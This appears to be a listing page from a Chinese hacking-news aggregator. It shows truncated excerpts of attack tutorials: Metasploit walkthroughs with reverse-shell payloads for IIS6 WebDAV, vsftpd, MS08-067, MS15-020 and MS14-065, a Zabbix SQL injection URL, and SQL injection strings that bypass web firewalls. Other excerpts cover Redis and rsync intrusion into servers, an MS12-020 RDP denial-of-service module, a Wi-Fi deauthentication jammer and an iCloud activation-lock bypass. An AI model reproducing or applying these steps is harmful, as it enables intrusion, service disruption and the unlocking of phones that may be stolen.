记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

esp8266制作WIFI干扰器

只能攻击2.4g频率以下的设备   这是暗黑送我的一块板子   链接电源要会产生一个anhei的wifi   然后输入192.168.4.1   选择要攻击的wifi 默认的有三种攻击方式 Deauther 断网攻击 Beacon 按照下面列表名称生成一个热点 Probe-Request按照斜面列表的名称发送探测针 第一个只要点击后就会直接导致wifi无法使用,这个是第二个的运行部分截图               //具体功能还待研究
发布时间:2017-11-18 23:20 | 阅读:244130 | 评论:0 | 标签:安全文章

渗透测试项目(免费提供)

小组在今年年初成立过零组攻防实验室,实验室专门是为這个项目而生,但是因为某种原因, 我们的攻防实验室的测试项目开展到一半就不得散场,今日开始,小组将从新启动這一项目, 我们需要一个历练的机会,一次机缘,一次奇迹。 我们不相信奇迹,但我们会创造奇迹。     _______________________________________________________________________________________________________________________________________ 已经参与了项目的合作伙伴:
发布时间:2017-07-20 11:05 | 阅读:76696 | 评论:0 | 标签:安全文章

(CVE-2017-7269)iis6远程代码执行漏洞详细分析

作者:墨魂 poc:https://www.exploit-db.com/exploits/41738/ //我们博客之前发的有http://www.0-sec.org/2017/03/28/cve-2017-7269iis6远程代码执行漏洞/   利用条件是目标iis6.0 并且开启了webdav 我们测试的目标是:192.168.2.137   这样说明是可以利用的 kali的ip是:192.168.2.131   msf > use exploit/multi/handler msf>exploit(handler)  > set payload windows/meterpreter/reverse_http payload => window
发布时间:2017-04-04 04:55 | 阅读:555277 | 评论:0 | 标签:Exp分享 安全文章 漏洞

(CVE-2017-7269)iis6远程代码执行漏洞

漏洞描述 漏洞编号:CVE-2017-7269 发现人员:Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院) 漏洞简述:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行,目前针对 Windows Server 2003 R2 可以稳定利用,该漏洞最早在2016年7,8月份开始在野外被利用。 漏洞类型:缓冲区溢出 漏洞等级:高危 影响产品:Microsoft Windows Server 2003 R2 开启WebDAV服务的IIS6.0(目前已验证,其他版本尚未验证) 触发函数:ScStoragePathFromUrl函数 附加信息:ScStoragePathFromUrl函数被调用了两次 漏洞细节:在Windows Server 2003的
发布时间:2017-03-28 21:20 | 阅读:612090 | 评论:0 | 标签:安全文章 漏洞

zabbix系统注入漏洞

这个漏洞在之前也是疯狂的被刷了一波,但是很多小伙伴不晓得咋搞。今天小组就给大伙普及普及吧。 zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题 然后,注入是发生在文件jsrpc.php中, 然后我们测试的语句是这个/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php &profileIdx=web.item.graph&profileIdx2=(select (1) from users where 1=1 aNd (
发布时间:2017-02-21 22:00 | 阅读:115987 | 评论:0 | 标签:安全文章 注入 漏洞

破解iphone激活锁(icloud dns by pass)

如图所示,我们先正常启动 连接进自己的wifi 让后进行修改dns 可用的dns服务器: 70.109.17.60 104.154.51.7 104.155.28.90 104.155.220.58 78.109.17.60 //在设置dns前,建议先用电脑ping一下服务器,看看到底有没有开放。有些服务器是规定不同时间段进行开放的。 随机再重启手机 选择menu 再选择Applications //此时 该手机上面的游戏啊,短信啊,视频啊 就可以正常播放了 最后根据不同ios版本 来选择Crash的方案 进行绕过。 //小编到最后一步就失败了,可能是因为太帅的原因吧。如果谁有其他姿势,可以联系小编哦。 //要是有其他绕过姿势的,我们可以详聊qq2873225903
发布时间:2017-02-19 03:40 | 阅读:5141070 | 评论:1 | 标签:安全文章 phone

CSRF配合XSS打cookie

CSRF(Cross-site request forgery),中文名称:跨站请求伪造,CSRF可以对无token验证码的页面构造代码进行攻击 XSS跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 以下为了方便就录制了一个教程 点击跳转 密码: a2fn
发布时间:2017-02-03 22:45 | 阅读:210653 | 评论:0 | 标签:安全文章 xss CSRF

云锁/安全狗注入bypass

http://www.safedog.cn/?id=123/*/#*/union/*/#*/select/*/#*/1,2,3/*/#*/from/*/#*/admin http://www.yunsuo.com.cn/?id=2/*/#*/union/*/#*/select/*/#*/id,username,password/*/#*/from/*/#*/admin 使用sqlmap进行注入时 遇上安全狗/云锁的时候,保存上面脚本为ian.py sqlmap.py -u”http://www.baidu.com” –tamper=ian.py –delay 2 delay 2 间隔两秒发送包这样保持不会被安全狗封ip  
发布时间:2017-02-03 06:10 | 阅读:482204 | 评论:0 | 标签:安全文章 注入 安全狗

msf远程溢出(21端口)vsftpd漏洞

vsftpd version 2到2.3.4存在后门漏洞,攻击者可以通过该漏洞获取root权限。、 首先,先用nmap进行详细的扫描,命令如下 nmap -sT -A www.0-sec.org -sT namp还是比较强大的,会罗列出来 所有端口的详细信息 。 当然我们网站是没有开启21端口的,只是举个例子。 输入msfconsole打开msf 搜索vsftpd漏洞模块 msf > search vsftpd 已经发现了一个模块,直接调用这个模块 msf >use exploit/unix/ftp/vsftpd_234_backdoor msf  exploit(vsftpd_234_backdoor) > show options msf  ex
发布时间:2017-02-03 06:10 | 阅读:155214 | 评论:0 | 标签:安全文章 溢出 漏洞

redis未授权访问漏洞

(⊙v⊙)我们零组的博客又重新开了,希望大家能踊跃发帖哦~ ps:redis一般都是6379端口 诺,直接可以进行连接   连接后输入命令info 可以查看到具体的信息 接下来只需要找到网站的根目录,让后用config ,set命令来写入shell  
发布时间:2017-02-03 06:10 | 阅读:97193 | 评论:0 | 标签:安全文章 漏洞

rsync(873端口)漏洞

先看看nmap扫描的端口吧 其中837端口就是rsync服务 rsync ip::                               //列出当前目录 这里显示的是root,就证明有戏了   rsync ip::root/                          //进入root目录 ps:最好是找到网站的路径(比如报错啊,什么的),这样getshell就方便一些。 当然如果实在找不到了,那就在这些文件里面一个一个找吧   找到路径后 rsync -avz 121.88.5.142::ROOT/目录 /root/本机目录                 //下载网站全部源码到本地   下载后,就是进行简易的代码审计。可以查找sql密码,或者本地审计漏洞。
发布时间:2017-02-03 06:10 | 阅读:176325 | 评论:0 | 标签:安全文章 漏洞

HTTP.SYS远程执行代码漏洞(ms15-034)

我们团队针对这个漏洞,有专门做了一个视频。 传送门http://www.0-sec.org/ms15-034(HTTP.SYS远程执行代码漏洞).rar   影响版本:Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2 poc下载地址:https://github.com/poshsecurity/MS15034 这个脚本有三个参数 1. windows2008 2. windows2012 3. -serverPath 前两个参数代表被攻击的机器,它们会访问http://computer/welcom.png 和 http://computer/iis-
发布时间:2017-02-03 06:10 | 阅读:347996 | 评论:0 | 标签:安全文章 漏洞

ms08-067漏洞 远程溢出入侵测试

被攻击者IP地址:192.168.9.4,操作系统Windows XP sp3 English 攻击者IP地址:192.168.9.1   //查看数据库连接状态 msf > db_status [*] postgresql connected to msf3 //使用nmap扫描目标机器 msf > db_nmap -sS -sV -O –script=smb-check-vulns.nse -n 192.168.9.4 [*] Nmap: Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2016-08-7 23:01 [*] Nmap: Nmap scan report for 192.168.9.4 [*] Nmap: Host is u
发布时间:2017-02-03 06:10 | 阅读:141645 | 评论:0 | 标签:安全文章 溢出 漏洞

ms15-020(远程溢出入侵)

我们有专门做了一个教程 传送门:www.0-sec.org/ms15-020(远程溢出入侵).rar     msfconsole //启动msf(metasploit framework) search ms15 //搜索关键字相关漏洞 use exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader //漏洞利用模块 info //查看漏洞相关信息 set payload windows/meterpreter/reverse_tcp //设置一个反弹shell set UNCHOST 192.168.1.3 //我设置为我的另一台主机地址 就是你开着共享那台机器的地址 set UNCSHARE share //设置共享文件的
发布时间:2017-02-03 06:10 | 阅读:500301 | 评论:0 | 标签:安全文章 溢出

ms14-065(IE浏览器远程代码执行漏洞)

我们有专门录了一个视频 传送门:www.0-sec.org/ms14-065(IE浏览器远程代码执行漏洞).zip     我们本节说一下ms14-065 ie漏洞 https://technet.microsoft.com/library/security/ms14-065 微软的官方公告,可以看一下自己本机是不是有漏洞。 我本机刚好有所以就用本机进行演示了 可以看到现在电脑就一个administrator管理用户 我们现在用这个测试漏洞是否存在的exp用ie打开运行一下 可以看到自动添加了一个test用户证明漏洞确实存在 接着我们配置一个远控 这里我用它作为服务 http://192.168.0.103/065.exe 确定是可以访问的 这个就是html的exp了,接着我们打开kail用
发布时间:2017-02-03 06:10 | 阅读:143933 | 评论:0 | 标签:安全文章 漏洞

ms12-020(拒绝服务)

我们团队专门录了一个视频 传送门:www.0-sec.org/ms12-020.rar     //让对方服务器蓝屏 MSF:use auxiliary/dos/windows/rdp/ms12_020_maxchannelids show options set RHOST ip set RPORT 3389 exploit 当出现 seems down就说明目标已经被攻击。 #!/usr/bin/env python ############################################################################# # MS12-020 Exploit by Sabu # sabu@fbi.gov # Uses FreeRDP ##
发布时间:2017-02-03 06:10 | 阅读:95584 | 评论:0 | 标签:安全文章

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云